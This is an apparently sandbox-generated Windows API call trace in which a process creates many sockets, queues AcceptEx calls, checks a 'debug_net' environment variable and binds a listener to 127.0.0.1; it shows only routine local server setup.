	[0108.353] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x918, lpOutputBuffer=0x51c3ef8, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c3ed8 | out: lpOutputBuffer=0x51c3ef8, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c3ed8) returned 0
	[0108.353] GetLastError () returned 0x3e5
	[0108.353] socket (af=2, type=1, protocol=0) returned 0x91c
	[0108.353] SetHandleInformation (hObject=0x91c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.353] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x91c, lpOutputBuffer=0x51c4064, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c4044 | out: lpOutputBuffer=0x51c4064, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c4044) returned 0
	[0108.354] GetLastError () returned 0x3e5
	[0108.354] socket (af=2, type=1, protocol=0) returned 0x920
	[0108.354] SetHandleInformation (hObject=0x920, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.354] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x920, lpOutputBuffer=0x51c41d0, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c41b0 | out: lpOutputBuffer=0x51c41d0, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c41b0) returned 0
	[0108.354] GetLastError () returned 0x3e5
	[0108.354] socket (af=2, type=1, protocol=0) returned 0x924
	[0108.354] SetHandleInformation (hObject=0x924, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.354] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x924, lpOutputBuffer=0x51c433c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c431c | out: lpOutputBuffer=0x51c433c, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c431c) returned 0
	[0108.354] GetLastError () returned 0x3e5
	[0108.354] socket (af=2, type=1, protocol=0) returned 0x928
	[0108.354] SetHandleInformation (hObject=0x928, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.354] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x928, lpOutputBuffer=0x51c44a8, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c4488 | out: lpOutputBuffer=0x51c44a8, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c4488) returned 0
	[0108.354] GetLastError () returned 0x3e5
	[0108.354] socket (af=2, type=1, protocol=0) returned 0x92c
	[0108.354] SetHandleInformation (hObject=0x92c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.354] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x92c, lpOutputBuffer=0x51c4614, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c45f4 | out: lpOutputBuffer=0x51c4614, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c45f4) returned 0
	[0108.354] GetLastError () returned 0x3e5
	[0108.355] socket (af=2, type=1, protocol=0) returned 0x930
	[0108.355] SetHandleInformation (hObject=0x930, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.355] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x930, lpOutputBuffer=0x51c4780, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c4760 | out: lpOutputBuffer=0x51c4780, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c4760) returned 0
	[0108.355] GetLastError () returned 0x3e5
	[0108.355] socket (af=2, type=1, protocol=0) returned 0x934
	[0108.355] SetHandleInformation (hObject=0x934, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.355] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x934, lpOutputBuffer=0x51c48ec, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c48cc | out: lpOutputBuffer=0x51c48ec, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c48cc) returned 0
	[0108.355] GetLastError () returned 0x3e5
	[0108.355] socket (af=2, type=1, protocol=0) returned 0x938
	[0108.356] SetHandleInformation (hObject=0x938, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.356] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x938, lpOutputBuffer=0x51c4a58, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c4a38 | out: lpOutputBuffer=0x51c4a58, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c4a38) returned 0
	[0108.356] GetLastError () returned 0x3e5
	[0108.356] socket (af=2, type=1, protocol=0) returned 0x93c
	[0108.356] SetHandleInformation (hObject=0x93c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.356] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x93c, lpOutputBuffer=0x51c4bc4, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c4ba4 | out: lpOutputBuffer=0x51c4bc4, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c4ba4) returned 0
	[0108.356] GetLastError () returned 0x3e5
	[0108.356] socket (af=2, type=1, protocol=0) returned 0x940
	[0108.356] SetHandleInformation (hObject=0x940, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.356] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x940, lpOutputBuffer=0x51c4d30, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c4d10 | out: lpOutputBuffer=0x51c4d30, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c4d10) returned 0
	[0108.356] GetLastError () returned 0x3e5
	[0108.356] socket (af=2, type=1, protocol=0) returned 0x944
	[0108.356] SetHandleInformation (hObject=0x944, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.356] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x944, lpOutputBuffer=0x51c4e9c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c4e7c | out: lpOutputBuffer=0x51c4e9c, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c4e7c) returned 0
	[0108.356] GetLastError () returned 0x3e5
	[0108.356] socket (af=2, type=1, protocol=0) returned 0x948
	[0108.356] SetHandleInformation (hObject=0x948, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.356] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x948, lpOutputBuffer=0x51c5008, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c4fe8 | out: lpOutputBuffer=0x51c5008, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c4fe8) returned 0
	[0108.357] GetLastError () returned 0x3e5
	[0108.357] socket (af=2, type=1, protocol=0) returned 0x94c
	[0108.357] SetHandleInformation (hObject=0x94c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.357] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x94c, lpOutputBuffer=0x51c5174, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c5154 | out: lpOutputBuffer=0x51c5174, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c5154) returned 0
	[0108.357] GetLastError () returned 0x3e5
	[0108.357] socket (af=2, type=1, protocol=0) returned 0x950
	[0108.357] SetHandleInformation (hObject=0x950, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.357] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x950, lpOutputBuffer=0x51c52e0, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c52c0 | out: lpOutputBuffer=0x51c52e0, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c52c0) returned 0
	[0108.357] GetLastError () returned 0x3e5
	[0108.357] socket (af=2, type=1, protocol=0) returned 0x954
	[0108.357] SetHandleInformation (hObject=0x954, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.357] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x954, lpOutputBuffer=0x51c544c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c542c | out: lpOutputBuffer=0x51c544c, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c542c) returned 0
	[0108.357] GetLastError () returned 0x3e5
	[0108.357] socket (af=2, type=1, protocol=0) returned 0x958
	[0108.357] SetHandleInformation (hObject=0x958, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.357] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x958, lpOutputBuffer=0x51c55b8, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c5598 | out: lpOutputBuffer=0x51c55b8, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c5598) returned 0
	[0108.357] GetLastError () returned 0x3e5
	[0108.358] socket (af=2, type=1, protocol=0) returned 0x95c
	[0108.358] SetHandleInformation (hObject=0x95c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.358] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x95c, lpOutputBuffer=0x51c5724, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c5704 | out: lpOutputBuffer=0x51c5724, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c5704) returned 0
	[0108.358] GetLastError () returned 0x3e5
	[0108.358] socket (af=2, type=1, protocol=0) returned 0x960
	[0108.358] SetHandleInformation (hObject=0x960, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.358] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x960, lpOutputBuffer=0x51c5890, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c5870 | out: lpOutputBuffer=0x51c5890, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c5870) returned 0
	[0108.358] GetLastError () returned 0x3e5
	[0108.358] socket (af=2, type=1, protocol=0) returned 0x964
	[0108.358] SetHandleInformation (hObject=0x964, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.358] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x964, lpOutputBuffer=0x51c59fc, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c59dc | out: lpOutputBuffer=0x51c59fc, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c59dc) returned 0
	[0108.358] GetLastError () returned 0x3e5
	[0108.358] socket (af=2, type=1, protocol=0) returned 0x968
	[0108.359] SetHandleInformation (hObject=0x968, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.359] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x968, lpOutputBuffer=0x51c5b68, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c5b48 | out: lpOutputBuffer=0x51c5b68, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c5b48) returned 0
	[0108.359] GetLastError () returned 0x3e5
	[0108.359] socket (af=2, type=1, protocol=0) returned 0x96c
	[0108.359] SetHandleInformation (hObject=0x96c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.359] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x96c, lpOutputBuffer=0x51c5cd4, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c5cb4 | out: lpOutputBuffer=0x51c5cd4, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c5cb4) returned 0
	[0108.359] GetLastError () returned 0x3e5
	[0108.359] socket (af=2, type=1, protocol=0) returned 0x970
	[0108.359] SetHandleInformation (hObject=0x970, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.359] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x970, lpOutputBuffer=0x51c5e40, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c5e20 | out: lpOutputBuffer=0x51c5e40, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c5e20) returned 0
	[0108.359] GetLastError () returned 0x3e5
	[0108.359] socket (af=2, type=1, protocol=0) returned 0x974
	[0108.359] SetHandleInformation (hObject=0x974, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.359] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x974, lpOutputBuffer=0x51c5fac, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c5f8c | out: lpOutputBuffer=0x51c5fac, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c5f8c) returned 0
	[0108.359] GetLastError () returned 0x3e5
	[0108.359] socket (af=2, type=1, protocol=0) returned 0x978
	[0108.360] SetHandleInformation (hObject=0x978, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.360] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x978, lpOutputBuffer=0x51c6118, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c60f8 | out: lpOutputBuffer=0x51c6118, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c60f8) returned 0
	[0108.360] GetLastError () returned 0x3e5
	[0108.360] socket (af=2, type=1, protocol=0) returned 0x97c
	[0108.360] SetHandleInformation (hObject=0x97c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.360] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x97c, lpOutputBuffer=0x51c6284, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c6264 | out: lpOutputBuffer=0x51c6284, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c6264) returned 0
	[0108.360] GetLastError () returned 0x3e5
	[0108.360] socket (af=2, type=1, protocol=0) returned 0x980
	[0108.360] SetHandleInformation (hObject=0x980, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.360] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x980, lpOutputBuffer=0x51c63f0, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c63d0 | out: lpOutputBuffer=0x51c63f0, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c63d0) returned 0
	[0108.360] GetLastError () returned 0x3e5
	[0108.360] socket (af=2, type=1, protocol=0) returned 0x984
	[0108.360] SetHandleInformation (hObject=0x984, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.361] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x984, lpOutputBuffer=0x51c655c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c653c | out: lpOutputBuffer=0x51c655c, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c653c) returned 0
	[0108.361] GetLastError () returned 0x3e5
	[0108.364] socket (af=2, type=1, protocol=0) returned 0x988
	[0108.364] SetHandleInformation (hObject=0x988, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.364] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x988, lpOutputBuffer=0x51c66c8, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c66a8 | out: lpOutputBuffer=0x51c66c8, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c66a8) returned 0
	[0108.364] GetLastError () returned 0x3e5
	[0108.364] socket (af=2, type=1, protocol=0) returned 0x98c
	[0108.364] SetHandleInformation (hObject=0x98c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.364] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x98c, lpOutputBuffer=0x51c6834, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c6814 | out: lpOutputBuffer=0x51c6834, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c6814) returned 0
	[0108.364] GetLastError () returned 0x3e5
	[0108.367] timeGetTime () returned 0x2e982
	[0108.367] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af918 | out: lpSystemTimeAsFileTime=0x20af918*(dwLowDateTime=0x722cf160, dwHighDateTime=0x1d492ec)) 
	[0108.367] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7d4, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\x2b14\x52\x3ac8\x52\x4bf8\x25b\xf96c\x20a\xf7ec\x209\x40") returned 0x0
	[0108.367] GetLastError () returned 0xcb
	[0108.367] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7e4, nSize=0x7fff | out: lpBuffer="\xf96c\x20a\xf7ec\x209\x40") returned 0x0
	[0108.367] GetLastError () returned 0xcb
	[0108.367] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7ac, nSize=0x7fff | out: lpBuffer="\x2b14\x52\x3ac8\x52\x38ca\x3f8\xf858\x20a\x4bd0\x25b\xf7f0\x20a\x37d9\x3f8\x2b14\x52\x60a0\x26d\x09") returned 0x0
	[0108.367] GetLastError () returned 0xcb
	[0108.367] htons (hostshort=0x192) returned 0x9201
	[0108.368] socket (af=2, type=1, protocol=0) returned 0x990
	[0108.368] ioctlsocket (in: s=0x990, cmd=-2147195266, argp=0x20af788 | out: argp=0x20af788) returned 0
	[0108.368] SetHandleInformation (hObject=0x990, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.368] CreateIoCompletionPort (FileHandle=0x990, ExistingCompletionPort=0x398, CompletionKey=0x990, NumberOfConcurrentThreads=0x0) returned 0x398
	[0108.368] SetFileCompletionNotificationModes (FileHandle=0x990, Flags=0x3) returned 1
	[0108.368] bind (s=0x990, addr=0x20af7d8*(sa_family=2, sin_port=0x192, sin_addr="127.0.0.1"), namelen=16) returned 0
	[0108.368] WSAIoctl (in: s=0x990, dwIoControlCode=0xc8000006, lpvInBuffer=0x20af7bc, cbInBuffer=0x10, lpvOutBuffer=0x51b2d2c, cbOutBuffer=0x4, lpcbBytesReturned=0x20af7b8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x51b2d2c, lpcbBytesReturned=0x20af7b8, lpOverlapped=0x0) returned 0
	[0108.368] listen (s=0x990, backlog=511) returned 0
	[0108.369] socket (af=2, type=1, protocol=0) returned 0x994
	[0108.369] SetHandleInformation (hObject=0x994, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.369] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x994, lpOutputBuffer=0x51c9db8, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c9d98 | out: lpOutputBuffer=0x51c9db8, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51c9d98) returned 0
	[0108.369] GetLastError () returned 0x3e5
	[0108.369] socket (af=2, type=1, protocol=0) returned 0x998
	[0108.369] SetHandleInformation (hObject=0x998, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.369] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x998, lpOutputBuffer=0x51c9f24, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c9f04 | out: lpOutputBuffer=0x51c9f24, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51c9f04) returned 0
	[0108.369] GetLastError () returned 0x3e5
	[0108.369] socket (af=2, type=1, protocol=0) returned 0x99c
	[0108.369] SetHandleInformation (hObject=0x99c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.369] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x99c, lpOutputBuffer=0x51ca090, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51ca070 | out: lpOutputBuffer=0x51ca090, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51ca070) returned 0
	[0108.369] GetLastError () returned 0x3e5
	[0108.369] socket (af=2, type=1, protocol=0) returned 0x9a0
	[0108.369] SetHandleInformation (hObject=0x9a0, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.369] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9a0, lpOutputBuffer=0x51ca1fc, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51ca1dc | out: lpOutputBuffer=0x51ca1fc, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51ca1dc) returned 0
	[0108.370] GetLastError () returned 0x3e5
	[0108.370] socket (af=2, type=1, protocol=0) returned 0x9a4
	[0108.371] SetHandleInformation (hObject=0x9a4, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.371] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9a4, lpOutputBuffer=0x51ca368, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51ca348 | out: lpOutputBuffer=0x51ca368, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51ca348) returned 0
	[0108.371] GetLastError () returned 0x3e5
	[0108.371] socket (af=2, type=1, protocol=0) returned 0x9a8
	[0108.371] SetHandleInformation (hObject=0x9a8, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.371] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9a8, lpOutputBuffer=0x51ca4d4, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51ca4b4 | out: lpOutputBuffer=0x51ca4d4, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51ca4b4) returned 0
	[0108.371] GetLastError () returned 0x3e5
	[0108.371] socket (af=2, type=1, protocol=0) returned 0x9ac
	[0108.371] SetHandleInformation (hObject=0x9ac, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.371] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9ac, lpOutputBuffer=0x51ca640, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51ca620 | out: lpOutputBuffer=0x51ca640, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51ca620) returned 0
	[0108.371] GetLastError () returned 0x3e5
	[0108.371] socket (af=2, type=1, protocol=0) returned 0x9b0
	[0108.371] SetHandleInformation (hObject=0x9b0, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.371] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9b0, lpOutputBuffer=0x51ca7ac, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51ca78c | out: lpOutputBuffer=0x51ca7ac, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51ca78c) returned 0
	[0108.371] GetLastError () returned 0x3e5
	[0108.371] socket (af=2, type=1, protocol=0) returned 0x9b4
	[0108.372] SetHandleInformation (hObject=0x9b4, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.372] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9b4, lpOutputBuffer=0x51ca918, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51ca8f8 | out: lpOutputBuffer=0x51ca918, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51ca8f8) returned 0
	[0108.372] GetLastError () returned 0x3e5
	[0108.372] socket (af=2, type=1, protocol=0) returned 0x9b8
	[0108.372] SetHandleInformation (hObject=0x9b8, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.372] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9b8, lpOutputBuffer=0x51caa84, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51caa64 | out: lpOutputBuffer=0x51caa84, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51caa64) returned 0
	[0108.372] GetLastError () returned 0x3e5
	[0108.372] socket (af=2, type=1, protocol=0) returned 0x9bc
	[0108.372] SetHandleInformation (hObject=0x9bc, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.372] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9bc, lpOutputBuffer=0x51cabf0, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cabd0 | out: lpOutputBuffer=0x51cabf0, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cabd0) returned 0
	[0108.372] GetLastError () returned 0x3e5
	[0108.372] socket (af=2, type=1, protocol=0) returned 0x9c0
	[0108.372] SetHandleInformation (hObject=0x9c0, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.372] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9c0, lpOutputBuffer=0x51cad5c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cad3c | out: lpOutputBuffer=0x51cad5c, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cad3c) returned 0
	[0108.372] GetLastError () returned 0x3e5
	[0108.372] socket (af=2, type=1, protocol=0) returned 0x9c4
	[0108.373] SetHandleInformation (hObject=0x9c4, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.373] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9c4, lpOutputBuffer=0x51caec8, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51caea8 | out: lpOutputBuffer=0x51caec8, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51caea8) returned 0
	[0108.373] GetLastError () returned 0x3e5
	[0108.373] socket (af=2, type=1, protocol=0) returned 0x9c8
	[0108.373] SetHandleInformation (hObject=0x9c8, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.373] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9c8, lpOutputBuffer=0x51cb034, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cb014 | out: lpOutputBuffer=0x51cb034, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cb014) returned 0
	[0108.373] GetLastError () returned 0x3e5
	[0108.373] socket (af=2, type=1, protocol=0) returned 0x9cc
	[0108.373] SetHandleInformation (hObject=0x9cc, dwMask=0x1, dwFlags=0x0) returned 1
